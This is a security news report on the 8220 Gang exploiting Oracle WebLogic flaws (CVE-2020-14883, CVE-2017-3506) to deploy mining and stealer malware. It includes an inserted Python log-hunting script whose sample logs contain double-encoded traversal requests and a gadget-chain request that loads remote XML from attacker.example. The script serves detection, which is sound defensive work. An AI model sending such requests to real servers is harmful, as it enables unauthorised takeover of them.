8220 Gang Exploits Oracle WebLogic Server Flaw to Proliferate Malware

December 19, 2023

The cybercriminal collective known as the 8220 Gang has been detected exploiting a significant vulnerability (CVE-2020-14883) in Oracle's WebLogic Server to disseminate their malware. This flaw, with a CVSS score of 7.2, is a remote code execution bug that could be leveraged by authenticated attackers to gain control over vulnerable servers.

Imperva, in a report issued last week, stated, "This vulnerability allows remote authenticated attackers to execute code using a gadget chain and is commonly chained with CVE-2020-14882 (an authentication bypass vulnerability also affecting Oracle Weblogic Server) or the use of leaked, stolen, or weak credentials." The 8220 Gang has a track record of exploiting known security vulnerabilities to propagate cryptojacking malware.
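As an added illustration (not from the article or from Imperva's report) of how a defender might hunt for the chain described above in WebLogic access logs: the log lines below are constructed, the double-encoded traversal into `console.portal` is the publicly documented shape of CVE-2020-14882 requests, and the `EXAMPLE.Gadget(...)` handle value is a placeholder standing in for the CVE-2020-14883 constructor-call pattern that points at a remote XML file.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access log (placeholder IPs, placeholder gadget name).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Dec/2023:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1234
10.0.0.9 - - [19/Dec/2023:10:01:07 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 5120
10.0.0.9 - - [19/Dec/2023:10:01:09 +0000] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 88
10.0.0.7 - - [19/Dec/2023:10:02:00 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=EXAMPLE.Gadget(%22http://attacker.example/x.xml%22) HTTP/1.1" 200 90
10.0.0.3 - - [19/Dec/2023:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 42
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def fully_decode(s, rounds=3):
    # Peel off repeated percent-encoding (%252e -> %2e -> .) so the
    # double-encoded traversal used to reach the console is visible.
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = fully_decode(parts.path)
    flags = []
    # CVE-2020-14882 shape: a traversal segment under /console/ that lands on console.portal,
    # which is what lets an unauthenticated request reach the admin console.
    if path.startswith("/console/") and ".." in path and path.endswith("console.portal"):
        flags.append("CVE-2020-14882 traversal to console.portal")
    # CVE-2020-14883 shape: a handle= parameter carrying a constructor call (gadget chain).
    handle = fully_decode(parse_qs(parts.query).get("handle", [""])[0])
    if handle and "(" in handle:
        flags.append("CVE-2020-14883 handle= constructor call")
    if not flags:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")), "flags": flags}

def scan(log_text):
    # Return one hit per suspicious line, preserving log order.
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]
```

A 200 status on a flagged line means the server accepted the console request without a login, which is the signal worth alerting on.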

Earlier in May, the group was noticed using another Oracle WebLogic server vulnerability (CVE-2017-3506, CVSS score: 7.4) to integrate devices into a crypto mining botnet. Imperva's recent documentation of the group's attack chains includes the exploitation of CVE-2020-14883 to create specially designed XML files and ultimately execute code that deploys stealer and coin mining malware such as Agent Tesla, rhajk, and nasqa.

According to Daniel Johnston, a security researcher at Imperva, the group appears to be opportunistic in its target selection, with no discernible trend in country or industry. Its campaign targets include sectors such as healthcare, telecommunications, and financial services in countries including the U.S., South Africa, Spain, Colombia, and Mexico. Johnston further added, "The group relies on simple, publicly available exploits to target well-known vulnerabilities and exploit easy targets to achieve their objectives. While considered unsophisticated, they are constantly evolving their tactics and techniques to evade detection."
